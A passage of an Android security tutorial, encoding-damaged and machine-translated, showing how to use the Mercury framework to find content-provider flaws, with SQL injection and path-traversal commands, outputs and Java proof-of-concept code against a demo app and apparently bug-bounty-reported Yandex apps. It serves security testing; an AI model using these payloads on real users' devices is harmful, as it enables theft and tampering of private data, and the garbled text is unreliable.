
çãããããã«ã¡ã¯ã ä»æ¥ã¯ãç§ãã¡ãä»ã®äººã®Androidã¢ããªã±ãŒã·ã§ã³ã§è匱æ§ãèŠã€ããæ¹æ³ãšæ¹æ³ãèŠãŠãããŸãã ãŸãããããã®è匱æ§ã®ãããã§æ»æè ãã§ããããšãããããŸãã ããã«ãYandexã®ã³ã³ãã¹ãã Hunting for bugs ãã®ãã¬ãŒã ã¯ãŒã¯ã§èŠã€ãã£ãè匱æ§ã®äŸã瀺ããŸãã
ãã¹ã察象ã®ã€ã³ã¹ããŒã«
ã¢ãã€ã«ããã€ã¹ã®ããã°ã©ãã³ã°ã«ã€ããŠã¯ãããŒããŠã§ã¢ãšãšãã¥ã¬ãŒã¿ãŒã䜿çšããŠèª¿æ»ã§ããŸãã å®éã®ããã€ã¹ã«ç¹å¥ãªåé¡ããªãå ŽåãGoogle Playãããšãã¥ã¬ãŒã¿ã«apkã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ãããšåé¡ãçºçããŸãã Yandexããããã°ã©ã ãååŸããæãç°¡åãªæ¹æ³ã¯ããã§ãã
apkãã¡ã€ã«ãååŸããããã®ãªãã·ã§ã³ãåæããŸãïŒäžéšã¯æ¢ã«Habrã®ããŒãžã«ãããŸããããç¹°ãè¿ããŸãïŒã
- ã¢ããªã±ãŒã·ã§ã³ãå®éã®ããã€ã¹ã«ããŠã³ããŒãããadbã䜿çšããŠã³ã³ãã¥ãŒã¿ãŒã«è»¢éããŸãã
- ããã€ã¹ã®å¯çšæ§ã確èªããŸãã
adb devices
- ãã¹ãŠã®ã€ã³ã¹ããŒã«æžã¿ã¢ããªã±ãŒã·ã§ã³ã¯ããã€ã³ã¹ããŒã©ãŒãã/ data / appãã©ã«ããŒã«ä¿åããŸãã
adb pull /data/app/ru.yandex.yandexmaps-1.apk C:\
Android OSã¯ã€ã³ã¹ããŒã«ãããåããã°ã©ã ã®çªå·ä»ãã䜿çšãããããæåŸã«ã-1ããŸãã¯ã-2ãã®ãããããæå®ã§ããŸãã ãŸãã¯ãå°æ¥ã®åæã®ããã«ã/ data / appã»ã¯ã·ã§ã³ããã€ã³ã¹ããŒã«ãããŠãããã¹ãŠã®ã¢ããªã±ãŒã·ã§ã³ãããŠã³ããŒãã§ããŸãã
adb pull /data/app path_to_comp
LGé»è©±ãããã¹ãŠã®ããã°ã©ã ãã³ããŒãã
- ããã€ã¹ã®å¯çšæ§ã確èªããŸãã
- éå
¬åŒã®APIã§ã¹ã¯ãªããã䜿çšããŸãã
ç§ã¯pythonã§æžããããªãã·ã§ã³ã䜿çšããŠããŸãã ããã¯githubã«æçš¿ãããŠãããjavaã«é¡äŒŒããŠããŸãã ãã®æäœã«ã¯ããŠãŒã¶ãŒåãŸãã¯ä»ã®Googleã¢ã«ãŠã³ãã«æ¥ç¶ãããŠããå®éã®ããã€ã¹ã®AndroidIDãšããŠãŒã¶ãŒåãšãã¹ã¯ãŒããŸãã¯AuthTokenãå¿ èŠã§ãã
AndroidIDã¯ãUSSDã³ãã³ããå ¥åããŠèŠã€ããããšãã§ããŸãã
*#*#8255#*#*
ããã§ãæŽå©ãã©ã¡ãŒã¿ã¯AndroidIDã§ãã ãããã¯ãã¹ãŠconfig.pyãã¡ã€ã«ã«å ¥åãããŸãã ããã«ãããšãã°ã次ã®ã³ãã³ãã䜿çšããŠãåžå Žã«ãããã¹ãŠã®Yandexããã°ã©ã ãæ€çŽ¢ã§ããŸãã
search.py yandex
å®è¡çµæ
- Googleããšãã¥ã¬ãŒã¿ã§ãã¬ã€ããã·ã£ãŒãããã¯ãªæ¹æ³ã§ã€ã³ã¹ããŒã«ããŸãã
- ããšãã°ããµã€ãããããŠã³ããŒãããŸãã
W3bsit3 - dns.com- ãã¯ã©ãã¯ããããããã°ã©ã ãå«ãããã¹ãŠã®äººæ°ã®ããããã°ã©ã ããããŸããããããã¯ãã¡ããåç §çšã§ãã
xda-developers-ã»ãšãã©ããç¡æããŸãã¯ãªãŒãã³ãœãŒã¹ããã°ã©ã çšã®APKã§ãã
ãã®å Žåãã¢ããªã±ãŒã·ã§ã³ã¯ãã©ãŠã¶ãä»ããŠããã€ã¹ã«çŽæ¥ã€ã³ã¹ããŒã«ã§ããŸãã
ãšãã¥ã¬ãŒã¿ãŒã«ã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ããæ¹æ³ã¯2ã€ãããŸãã
- Eclipseã®DDMSçµç±ã§ãã¢ããªã±ãŒã·ã§ã³ã®ã€ã³ã¹ããŒã«ãã¿ã³ã䜿çšããŸãã
- adbã³ãã³ãçµç±ïŒ
adb install app.apk
è匱æ§åæããŒã«ããã
ãæåãåæã«å ããŠãå¯èœãªéããåŒçšç¬Šããæ¿å ¥ããŸã; Androidã¢ããªã±ãŒã·ã§ã³ã®è匱æ§ãæ€çŽ¢ããããã®ããã°ã©ã ã¯å€ããããŸããã æã人æ°ã®ãããã®ã¯æ¬¡ã®ãšããã§ãã
- ã¹ã«ã³ããã€ã
- æ°Žé
ScanDroidã¯ãã¢ããªã±ãŒã·ã§ã³ããdexã¯ã©ã¹ãJavaã³ãŒãã«éã³ã³ãã€ã«ããç¹å®ã®ã«ãŒã«ã«åŸã£ãŠãŠãŒã¶ãŒãæœåšçã«å±éºãªå Žæã瀺ãããã«æ€çŽ¢ããã«ããŒã¹ã¯ãªããã§ãã ããã°ã©ã ãŸãã¯ç¿»èš³ã®äœæè ããã®ããã¥ã¡ã³ãã§è©³çŽ°ãèŠã€ããããšãã§ããŸãã ããã°ã©ã ã®ãœãŒã¹ã³ãŒãã衚瀺ãããŸãã
Mercuryã¯ãPythonã§æžããããªãŒãã³ãœãŒã¹ãã¬ãŒã ã¯ãŒã¯ã§ãã ããã¯ãAndroidããã€ã¹ã«ã€ã³ã¹ããŒã«ããå®è¡ãããŠãããã¹ãŠã®ã¢ããªã±ãŒã·ã§ã³ãšå¯Ÿè©±ã§ãã察話åããŒã«ã®ã»ããã§ãã ãããŠã圌ãšäžç·ã«ç¥ãåããç¶ããŸãã
æ°Žæã§åã
2.2.0ããŒãžã§ã³ã¯çŸåšå ¥æå¯èœã§ãããŒãžã§ã³1+ãšæ¯èŒããŠå®å šã«åèšèšãããŠããŸãã ãã ããã©ã¡ããããŠã³ããŒãå¯èœã§ããæåã®ããŒãžã§ã³ã®å Žåãã€ã³ã¹ããŒã«ã¯ç°¡åã§ãè¿œå ã®äŸåé¢ä¿ã¯äžèŠã§ãã
ã¡ã€ã³ãµã€ããŸãã¯githubãªããžããªããç®çã®ããŒãžã§ã³ãããŠã³ããŒãã§ããŸã ã ããã°ã©ã èªäœã¯2ã€ã®éšåã§æ§æãããŠããŸãã
- ã¯ã©ã€ã¢ã³ãã¯ãã³ã³ãã¥ãŒã¿ãŒäžã§å®è¡ããpythonããã°ã©ã ã§ãïŒ* nixãšwindowsã®äž¡æ¹ã§æ£åžžã«åäœããŸãïŒã
- ãšãŒãžã§ã³ãïŒ1+ããŒãžã§ã³ã§ã¯ããã®éšåã¯ãµãŒããŒãšåŒã°ããŠããŸããïŒã¯ãäžèšã®æ¹æ³ã®ããããã䜿çšããŠã€ã³ã¹ããŒã«ã§ããapkã¢ããªã±ãŒã·ã§ã³ã§ãã
ã¯ã©ã€ã¢ã³ãåŽã®ã€ã³ã¹ããŒã«
LinuxïŒDebianã©ã€ã¯ïŒ
äŸåé¢ä¿ã®ã€ã³ã¹ããŒã«ïŒ
$ apt-get install build-essential python-dev python-setuptools $ easy_install --allow-hosts pypi.python.org protobuf==2.4.1 $ easy_install twisted==10.2.0
æ°Žéã®ã€ã³ã¹ããŒã«ïŒ
$ easy_install ./mercury-2.2.0-py2.7.egg
çª
äŸåé¢ä¿ã®ã€ã³ã¹ããŒã«ïŒ
- éå§ããã«ã¯ã次ã®ããã°ã©ã ãããŠã³ããŒãããŸãã
- PythonïŒ www.python.org/download
- setuptoolsïŒ pypi.python.org/pypi/setuptools/0.6c11
- 次ã«ã次ã®ãã©ã¡ãŒã¿ãŒã䜿çšããŠããããå®è¡ããŸãã
C:\Python27\Scripts\easy_install.exe --allow-hosts pypi.python.org protobuf==2.4.1 C:\Python27\Scripts\easy_install.exe pyopenssl C:\Python27\Scripts\easy_install.exe pyreadline C:\Python27\Scripts\easy_install.exe twisted==10.2.0
- Windowsã€ã³ã¹ããŒã©ãŒãèµ·åããŸãã
Mac OS X
å ¬åŒã¬ã€ãã¯ãããŸããããXcodeã¯easy_installãå©çšå¯èœãªã³ãã³ãã©ã€ã³ããŒã«ã§ã€ã³ã¹ããŒã«ã§ãããããã³ãã³ãã䜿çšããŠã€ã³ã¹ããŒã«ããããšãããš
$ easy_install ./mercury-2.2.0-py2.7.egg
ãã¹ãŠãæ£åžžã«ã€ã³ã¹ããŒã«ãããŠçµäºããŸããã
èšçœ®äŸ

ãµãŒããŒã®ã€ã³ã¹ããŒã«
äžèšã®æ¹æ³ã®ããããã«ãã£ãŠã€ã³ã¹ããŒã«ãããŸãã
- adb install.apk
- DDMSçµç±ã
- ãµã€ãããçŽæ¥ããŠã³ããŒãããŠã€ã³ã¹ããŒã«ããŸãã
ã«ã¹ã¿ãã€ãº
ã¯ã©ã€ã¢ã³ããšãµãŒããŒãæ¥ç¶ããã«ã¯ãããã€ã¹ã®IPã¢ãã¬ã¹ãå¿ èŠã§ãããšãã¥ã¬ãŒã¿ãŒã®å Žåã¯ã次ã®ã³ãã³ãã§ããŒã転éãè¡ãå¿ èŠããããŸãã
adb forward tcp:31415 tcp:31415
ãããã£ãŠãã¹ãã£ããŒã®IPã¢ãã¬ã¹ã¯127.0.0.1ã«ãªããŸãã
å®éã®ããã€ã¹ã§ã¯ãWiFiãããã¯ãŒã¯ã®ãªã¹ãã§ç®çã®ããã€ã¹ãã¯ãªãã¯ããã ãã§ãå質ãã»ãã¥ãªãã£ã®ã¿ã€ããå¿ èŠãªIPã¢ãã¬ã¹ã«é¢ãã詳现æ å ±ãå«ããããã¢ãããŠã£ã³ããŠã衚瀺ãããŸãã
ã³ã³ãã¥ãŒã¿ãŒããèµ·åããåã«ãããã€ã¹ã§ã¢ããªã±ãŒã·ã§ã³ãå®è¡ããå¿ èŠããããŸãã åã蟌ã¿ãµãŒããŒãã¯ãªãã¯ããŠãã¹ã€ããããæå¹ãã®äœçœ®ã«åãæ¿ããŸãã 2çªç®ã®ããŒãžã§ã³ããã¯ãsslãä»ããŠãã©ãã£ãã¯ãæå·åãããã¹ã¯ãŒããèšå®ããããšãèš±å¯ãããŠããŸãã
ãšãã¥ã¬ãŒã¿ãŒã§ãšãŒãžã§ã³ããéå§ããäŸ

è匱æ§ãæ¢ã
ããã€ã¹ã«åå ããŸãã
WindowsïŒ
C:\Python27\Scripts\>python mercury console connect IP
æ°Žéã³ã³ãœãŒã«ã®å®è¡

UnixïŒ
mercury console connect IP
ã€ã³ã¹ããŒã«ãããŠãããã¹ãŠã®ã¢ãžã¥ãŒã«ã®ãªã¹ãã¯ã次ã®ã³ãã³ãã«ãã£ãŠåŒã³åºãããŸãã
list
ãªã¹ãã³ãã³ãåºå

ãã®èšäºã§ã¯ããã¹ãŠã§ã¯ãªããå®éã®äŸã§è匱æ§ãèŠã€ããããšãã§ãããã®ã®ã¿ãæ€èšããŸãã
æåã®å®éšããã°ã©ã ã¯ãéçºè ãææ¡ããSieveã§ãã
ãŸããããã°ã©ã ïŒããã±ãŒãžïŒã®ååãèŠã€ããå¿ èŠããããŸãã ãããè¡ãæ¹æ³ã«ã¯ããã€ãã®ãªãã·ã§ã³ããããŸãã
- ã³ãã³ããå®è¡ããŸãïŒ
mercury> run app.package.list
ãããŠãªã¹ãã§ããªãã®ãã®ãèŠã€ããŠãã ããã ãŸãã¯ãããšãã°ãã®å Žåããã£ã«ã¿ãŒãè¿œå ã§ããŸãã
mercury> run app.package.list âf sieve
- ä»»æã®ãã¡ã€ã«ãããŒãžã£ãŒãã/ data / dataãã©ã«ããŒèªäœã衚瀺ããŸãã
- ãã®ä»...
çµæãšããŠã com.mwr.example.sieveãšããååãååŸããŸã
ä»æ¥ã®èšäºã§ã¯ãå€ãã®äººãAnââdroid OSã§èŠãããšãæåŸ ããŠããªãã£ãããWebã«é¢é£ããŠããè匱æ§ãæ€èšããŸãã
- SQLã€ã³ãžã§ã¯ã·ã§ã³ã
- ä»»æã®ãã¡ã€ã«ãèªã¿åããŸãïŒLFIïŒã
ãããç¶ããŸãããã ã¢ããªã±ãŒã·ã§ã³ã«é¢ããæ å ±ãååŸããŸãã
mercury> run app.package.attacksurface com.mwr.example.sieve Attack Surface: 3 activities exported 0 broadcast receivers exported 2 content providers exported 2 services exported is debuggable
ã¢ã¯ãã£ãã㣠-Androidã¢ããªã±ãŒã·ã§ã³ã®è¡šçŸã¹ããŒã ã§ãã ããšãã°ãããã°ã©ã ãéãããšãã«ãŠãŒã¶ãŒã«è¡šç€ºãããã¡ã€ã³ç»é¢ã ãŸãã¯ããã°ã¬ããŒããéçºè ã«éä¿¡ããããã®ãã©ãŒã ã
ãµãŒãã¹ -ãŠãŒã¶ãŒã€ã³ã¿ãŒãã§ã€ã¹ãæäŸããã«ããã¯ã°ã©ãŠã³ãã¿ã¹ã¯ãå®è¡ããŸãã
ã³ã³ãã³ããããã€ã㌠-ã¢ããªã±ãŒã·ã§ã³ã«ããŒã¿ãæäŸããŸããã»ãšãã©ã®å Žåãsqliteã¢ããªã±ãŒã·ã§ã³ããŒã¿ããŒã¹ã«æäŸããŸãã ä»ã®ã¢ããªã±ãŒã·ã§ã³ããåŒã³åºãããšãã§ããŸãã
ãããŒããã£ã¹ãã¬ã·ãŒã㌠ïŒãããŒããã£ã¹ãã¬ã·ãŒããŒïŒ-ã·ã¹ãã ã¡ãã»ãŒãžãšæé»çãªã€ã³ãã³ããåä¿¡ããã·ã¹ãã ã¹ããŒã¿ã¹ã®å€åã«å¿çããããã«äœ¿çšã§ããŸãã
Habrã®ããŒãžã§ãç¹ã«Androidéçºãã¥ãŒããªã¢ã«ã§ ã Androidã¢ããªã±ãŒã·ã§ã³ã®æ§é ã«ã€ããŠè©³ããèªãããšãã§ããŸãã ãããŸã§ã¯ãã³ã³ãã³ããããã€ããŒã«å¯Ÿå¿ããŸãã å©çšå¯èœãªãªã¹ãã確èªããŸãã
mercury> run app.provider.finduri com.mwr.example.sieve Scanning com.mwr.example.sieve... content://com.mwr.example.sieve.DBContentProvider/ content://com.mwr.example.sieve.FileBackupProvider/ content://com.mwr.example.sieve.DBContentProvider/Passwords content://com.mwr.example.sieve.DBContentProvider/Keys content://com.mwr.example.sieve.FileBackupProvider
Mercuryã¯apkãã¡ã€ã«ãå±éããæ£èŠè¡šçŸã䜿çšããŠããcontentïŒ//ããšAndroidManifest.xmlãã¡ã€ã«ã®Providersãããã¯ãå«ãè¡ãååšãããã©ãããã¹ãã£ã³ããŸãã ç§ã®ç·Žç¿ã§ã¯ãéçºè ãããŸããŸãªæ¹æ³ã䜿çšããŠæå·åãããæååããèªåèªèº«ãä¿è·ããããã«ééãããããã¢ããªã±ãŒã·ã§ã³ãæåã§å ã«æ»ãå¿ èŠããããŸããã
ã³ã³ãã³ããããã€ããŒã¯ã»ãšãã©ã®å Žåãã¢ããªã±ãŒã·ã§ã³ã®sqliteããŒã¿ããŒã¹ãžã®ã¢ã¯ã»ã¹ãæäŸãããããéåžžã®sqlã¯ãšãªã解æããŸãã ã¯ãšãªã®æ¿å ¥ãæŽæ°ãåé€ã«åé¡ã¯ãªããšæãã®ã§ãselectã®ã¿ã«çŠç¹ãåœãŠãŸãã
ãã¹ã¯ãŒãã¯ç§ãæ¹ãã€ããæåã®ãã®ã§ã¯ãªããšæãã®ã§ããã®ãããã€ããŒããå§ããŸãããã
mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords | _id | service | username | password | email | | 1 | habr | root | uVYNVnRWZxRM355wU3PqdCTpYc8= (Base64-encoded) | root@main.habr |
ãããŠãã¯ãšãªãããã¹ãŠã®æ å ±ãååŸããŸãã次ã«ãå€ãè¯ãSQLã€ã³ãžã§ã¯ã·ã§ã³ãè©ŠããŠã¿ãŸãããã ã¢ã³ããã€ãã¢ããªã±ãŒã·ã§ã³ã§sqliteã䜿çšãããŠããããšãæãåºããŠãã ãããsqlite_masterïŒããŒã¿ããŒã¹å šäœã®æ§é ïŒã«ãªã¯ãšã¹ããéä¿¡ããŸãã
mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM sqlite_master--" | type | name | tbl_name | rootpage | sql | | table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) | | table | Passwords | Passwords | 4 | CREATE TABLE Passwords (_id INTEGER PRIMARY KEY,service TEXT,username TEXT,password BLOB,email) | | table | Key | Key | 5 | CREATE TABLE Key (Password TEXT PRIMARY KEY,pin TEXT ) | | index | sqlite_autoindex_Key_1 | Key | 6 | null |
ã芧ã®ãšãããSQLã€ã³ãžã§ã¯ã·ã§ã³ã¯æåããããŒã¿ããŒã¹æ§é å šäœïŒããŒãã«ãšãã£ãŒã«ãïŒãåŸãããŸããã ãšããã§ãä»ã®sqliteé¢æ°ãããã§æ©èœããŸããããšãã°ãããŒã¿ããŒã¹ã®ããŒãžã§ã³çªå·ãèŠã€ããããšãã§ããŸãã
mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "sqlite_version();--" | sqlite_version() | | 3.7.4 |
ãã®ã¢ããªã±ãŒã·ã§ã³ã®æ®ãã®è匱æ§ã¯å®¿é¡ã®ããã«æ®ã£ãŠããŸãããä»ã¯èšäºã®åé ã«æ»ããYandexã®ã¢ããªã±ãŒã·ã§ã³ã®çºèŠã«ã€ããŠè©±ãããšãçŽæããŸããã æ°Žéã®ãããã§ãæåã¯ç¬èªã®ã¢ããªã±ãŒã·ã§ã³ïŒPoCïŒãäœæããªããã°ãªããªãã£ããããæäœã®ãã¢ãç°¡çŽ åãããŸããã
PoCãœãŒã¹ã³ãŒãã®èŠç¹
// 2 -: sql- â* FROM sqlite_master--â // // uri â content provider // projectionArray â , : â* FROM sqlite_masterââ public static ArrayList<String> getColumns (ContentResolver resolver, String uri, String[] projectionArray) { ArrayList<String> columns = new ArrayList<String>(); try { Cursor c = resolver.query(Uri.parse(uri), projectionArray, null, null, null); if (c != null) { String [] colNames = c.getColumnNames(); c.close(); for (int k = 0; k < colNames.length; k++) columns.add(colNames[k]); } } catch (Throwable t) {} return columns; } // « », - // target â content-provider // projection â public String make_shoot(String target, String projection) { ContentResolver r = getContentResolver(); String[] projectionArray = null; if (projection.length() > 0) { projectionArray = new String[1]; int i = 0; projectionArray[i] = projection; } String data = ""; Cursor c = r.query(Uri.parse(target), projectionArray, null, null, null); if (c != null) { ArrayList<String> cols = getColumns(r, target, projectionArray); Iterator<String> it = cols.iterator(); String columns = ""; while (it.hasNext()) columns += it.next() + " | "; data += columns.substring(0, columns.length() - 3); data += "\n\n"; for (c.moveToFirst(); !c.isAfterLast(); c.moveToNext()) { int numOfColumns = c.getColumnCount(); for (int l = 0; l < numOfColumns; l++) { try { data += c.getString(l); } catch (Exception e) { data += "(blob) " + Base64.encodeToString(c.getBlob(l), Base64.DEFAULT); } if (l != (numOfColumns - 1)) data += " | "; } } } return data; }
以äžã«ããšã©ãŒæ å ±ãéä¿¡ããŠãã90æ¥ãšããå¶éã®ããã«èŠã€ãã£ãããã€ãã®è匱æ§ã®ã¿ã瀺ããŸãã
æåã®ã¢ããªã±ãŒã·ã§ã³ãäŸãšããŠäœ¿çšããŠãå¥ã®ã¿ã€ãã®è匱æ§ãæ€èšããŸãã ã³ã³ãã³ããããã€ããŒãä»ããSQLã€ã³ãžã§ã¯ã·ã§ã³ã«å ããŠãå€ãã®ã·ã¹ãã ãã¡ã€ã«ããã³è匱ãªã¢ããªã±ãŒã·ã§ã³ãã¢ã¯ã»ã¹ãããã¡ã€ã«ã«å¯ŸããŠããªãŒãã³ãã¹ãæ»æãå®è¡ã§ããŸãã Yandex.Diskã¢ããªã±ãŒã·ã§ã³ã«ãã®çš®ã®è匱æ§ãèŠã€ãããŸããã ãã¹ãŠã®ãŠãŒã¶ãŒãå©çšã§ãããããã€ããŒã³ã³ãã³ãã¯//ru.yandex.disk.cacheã§ãã ãŸããã·ã¹ãã ãã¡ã€ã«ãžã®ã¢ã¯ã»ã¹ã確èªããŸãã
mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../system/etc/hosts 127.0.0.1 localhost
次ã«ããã£ãšé¢çœããã®ã«ã¢ã¯ã»ã¹ããŠã¿ãŠãã ããã ããšãã°ãã¢ããªã±ãŒã·ã§ã³ããŒã¿ããŒã¹ã«ã ã¢ããªã±ãŒã·ã§ã³ãsqliteã䜿çšãããã®ãã©ã«ããŒå ã®å¥ã®ãã¡ã€ã«ã«ããŒã¿ããŒã¹ãä¿åããããšãæãåºãããŠãã ããããã®ãã¡ã€ã«ã¯ãã«ãŒããšåãã¢ããªã±ãŒã·ã§ã³ã®ã¿ãã¢ã¯ã»ã¹ã§ããŸãã
mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../../data/data/ru.yandex.disk/databases/disk
ã·ã¹ãã æåã®ãããã«ããã®äžã§ã®ã³ãã³ãã®åºå

ã芧ã®ãšãããYandex.diskã«ä¿åãããŠãããã¹ãŠã®ãã¡ã€ã«ã®ãªã¹ããååŸããŸãã ããã«ãã¢ããªã±ãŒã·ã§ã³ã¯ãã£ãã·ã¥ã䜿çšããããããŠãŒã¶ãŒãã¢ãã€ã«ã¢ããªã±ãŒã·ã§ã³ã䜿çšããŠéãããã¡ã€ã«ãåç §ã§ããŸããããã®åŸäžæãã¡ã€ã«ãå«ããã©ã«ããŒãã¯ãªã¢ããŸããã§ããã ããšãã°ããŠãŒã¶ãŒãYandex.Diskã®æäœã«é¢ããããã¥ã¡ã³ããéããå ŽåïŒ
mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../sdcard/Android/data/ru.yandex.disk/files/disk/readme.pdf
æ»æããã«ã¯ããã£ãã·ã¥ãã£ã¬ã¯ããªãç¥ãå¿ èŠããããŸãããããã¯æšæºã§ããã以åã®ãªã¯ãšã¹ãã§ãã¡ã€ã«åãã¢ããªã±ãŒã·ã§ã³ããŒã¿ããŒã¹ããååŸã§ããŸãã
PoCã§ã¯ããããã€ããŒãžã®ãã®åŒã³åºãã¯ã次ã®é¢æ°ãéããŠå®è£ ã§ããŸãã
resolver.openInputStream(uri)
ãŠãŒã¶ãŒã®ããã¯ããŒã¯ãæ åœããã³ã³ãã³ããããã€ããŒã§å¥ã®è匱æ§ãèŠã€ããããã¹ãŠã®ã¢ããªã±ãŒã·ã§ã³ãããããå€æŽã§ããããã«ãªããŸããã
mercury> run app.provider.query content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels geocode | label_name_tolower | lon | date | label_name | _id | lat , , , 2/417 | Neuronspace.ru | 37.5732 | 1352196244367 | Neuronspace.ru | 1 | 55.7137 , , , 2/417 | Work | 37.5732 | 1352196427356 | Work | 2 | 55.7137 : update content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels --string label_name_tolower=Home label_name=Home --where _id=2 query content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels geocode | label_name_tolower | lon | date | label_name | _id | lat , , , 2/417 | Neuronspace.ru | 37.5732 | 1352196244367 | Neuronspace.ru | 1 | 55.7137 , , , 2/417 | Home | 37.5732 | 1352196427356 | Home | 2 | 55.7137
ããã§ãä»äºã¯å®¶ã«ãªããŸããã ãŸãã¯ãå Žæã®åº§æšãå€æŽãããšããŠãŒã¶ãŒã¯ééã£ãäœæã«å°çããŸã...
次ã«è匱ãªããã°ã©ã ã¯Yandex.Electricsã§ãã ããã§ã¯ãããŒã¿ãæäœããæ©èœãåããããŒã¿ããŒã¹ãžã®SQLã€ã³ãžã§ã¯ã·ã§ã³ãªã©ã®è匱æ§ãçºèŠãããŸããã
mercury> run app.provider.query content://ru.yandex.rasp/files --projection "* FROM sqlite_master--" type | name | tbl_name | rootpage | sql ..... table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) table | files | files | 4 | CREATE TABLE files (_id integer primary key autoincrement, etag text, last_modified text, name text, region text,last_updated long,UNIQUE (name)) index | sqlite_autoindex_files_1 | files | 5 | null table | sqlite_sequence | sqlite_sequence | 6 | CREATE TABLE sqlite_sequence(name,seq) table | recent_stations | recent_stations | 7 | CREATE TABLE recent_stations (_id integer primary key autoincrement, region text, is_meta int,station_id text, UNIQUE (station_id, region)) index | sqlite_autoindex_recent_stations_1 | recent_stations | 8 | null table | favourite_stations | favourite_stations | 9 | CREATE TABLE favourite_stations (_id integer primary key autoincrement, station1 text, station1_meta int,station1_title text, station2 text,station2_meta int,station2_title text, current_from text, data_state int, identifier text, mirror_presented int, UNIQUE (identifier)) index | sqlite_autoindex_favourite_stations_1 | favourite_stations | 10 | null
ããŒã¿å€æŽã®äŸã«ã€ããŠã¯ããã¡ã€ã«ãã£ãã·ã¥ãžã®ãã¹ãå€æŽããŸãã
mercury> run app.provider.update content://ru.yandex.rasp/files --string name "/system/sdcard/hack.txtâ --where _id=2 _id | etag | last_modified | name | region | last_updated ..... 2 | 9bcbdc0620af50eadead14cdee81a1ded08f0259 | null | /system/sdcard/hack.txt | 213 | 1352462705854 1 | 548f13c285590c4bc8df665613d2d80e7be4678a | null | /data/data/ru.yandex.rasp/cache/all_cities.cache | | 1352462705064
ãã®è匱æ§ã«ãããæ»æè ã¯ãæ°ã«å ¥ãã®ã¹ããŒã·ã§ã³ãšæè¿ã®ã¹ããŒã·ã§ã³ã®ãªã¹ããèªã¿åããå€æŽããå¯èœæ§ããããŸãã ãŸãããã£ãã·ã¥ãžã®ãã¹ãå€æŽãããšããã®æç¹ã§ãŠãŒã¶ãŒãã€ã³ã¿ãŒãããã«æ¥ç¶ããŠããªãå Žåãã¢ããªã±ãŒã·ã§ã³ãããããããããããã¹ã±ãžã¥ãŒã«ãå€æŽãããã§ããŸãã
æåŸã«ãä»æ¥ã®è匱ãªããã°ã©ã -Yandex.Taxiã ä»åã¯ãªã¹ããšãããã䜿ã£ãŠäœãã§ãããã ãã瀺ããŸãã ããã€ãã®ã³ã³ãã³ããããã€ããŒãè匱ã§ããããšãå€æããŸããã
æåïŒ å 容ïŒ//ru.yandex.taxi/taxi
ãŠãŒã¶ãŒãå©çšã§ããã¿ã¯ã·ãŒã®ãªã¹ããåãåããå€æŽã§ããŸãã é話ã¯ã©ã€ããªãã¬ãŒã¿ãŒãçµç±ããããããŠãŒã¶ãŒã«è»ãæããããšãã§ãããã©ããã¯ããããŸãããããŠãŒã¶ãŒã«æãè¿ãã¿ã¯ã·ãŒããçªå·ããã®ä»ã®æ å ±ãååŸã§ããŸãã æ®ãã¯ããã»ã©é¢çœããªãïŒ
- å 容ïŒ//ru.yandex.taxi/history-ååã瀺ãããã«ãæ€çŽ¢ãšåŒã³åºãã®äž¡æ¹ã®å±¥æŽãžã®ã¢ã¯ã»ã¹ãèš±å¯ããŸããã
- å 容ïŒ//ru.yandex.taxi/delay_order-泚æå±¥æŽãžã®ã¢ã¯ã»ã¹ã
ãã®çš®ã®æ å ±ã¯ãã¹ãŠã®æ»æè ã«å¿ èŠãšããããã§ã¯ãããŸããããäžéšã®ãjeããŸãã¯ãç§ç«ãæ¢åµã¯èå³æ·±ãã§ãããã
ãããããã®ãããªè匱æ§ã®äž»ãªéãã¯ãäžèšã®ãã¹ãŠãå®è¡ããæªæã®ããã¢ããªã±ãŒã·ã§ã³ãè¿œå ã®æš©éãå¿ èŠãšããªãããšã§ãã æ»æè ã¯ãŠãŒã¶ãŒã«æ°ããå£çŽãé 眮ããããšãææ¡ã§ããŸããã»ãšãã©ã®äººã¯ãã¢ããªã±ãŒã·ã§ã³ã®ã€ã³ã¹ããŒã«ã«å¥åŠãªæš©éãå¿ èŠãªå Žåãããšãã°ãã¢ããªã±ãŒã·ã§ã³ãSMSãéä¿¡ãããããªãèŠãããã«sdã«ãŒããããŠã³ãããæš©å©ãå¿ èŠãšããããšãç¥ã£ãŠãããããæåã«ãããèŠãŠã¿ãŸãããã ãããã圌ã¯å¥åŠãªãã®ãèŠãããšã¯ãªããèšçœ®ã«ããåé¡ã¯ãªããšæããŸãã ãŸãã¯ããã®ãããªæ©èœãå¥ã®ã¢ããªã±ãŒã·ã§ã³ãããšãã°æã£ãŠããé³¥ã«åã蟌ã¿ãŸã...
æ°Žæã®ä»ã®æ©èœ
ãŸããããã€ã¹ã«ã€ã³ã¹ããŒã«ãããŠãããã¹ãŠã®ããã°ã©ã ãééããéžæããçš®é¡ã®è匱æ§ãèªåçã«æªçšããããšããã¹ãã£ããŒãå«ãŸããŠããŸãã 以åã®ã¿ã€ãã®è匱æ§ã®ã¹ãã£ããŒïŒ
- scanner.provider.injection-SQLã€ã³ãžã§ã¯ã·ã§ã³ã®å¯èœæ§ããã¹ãããŸã
- scanner.provider.traversal-䜿çšå¯èœãªãã¡ã€ã«ãèªã¿åãæ©èœã®ãã¹ã
ãã¹é瀺è匱æ§ã¹ãã£ããŒã®äŸ

æåã«ããã¹ãããã³ã³ãã³ããããã€ããŒã®ãªã¹ãã衚瀺ãããæåŸã«ãäžèšã®ã³ãã³ãããã³/ãŸãã¯å転ã«ãã£ãŠçµæããã§ãã¯ãããŸãã
äžéšã®ã¹ãã£ããŒã§ã¯ãããã€ã¹ã«busyboxãã€ã³ã¹ããŒã«ããå¿ èŠããããŸãã
mercury> run scanner.misc.readablefiles This command requires BusyBox to complete. Run tools.setup.busybox and then retry. mercury> run tools.setup.busybox BusyBox installed. mercury>
ãããã«
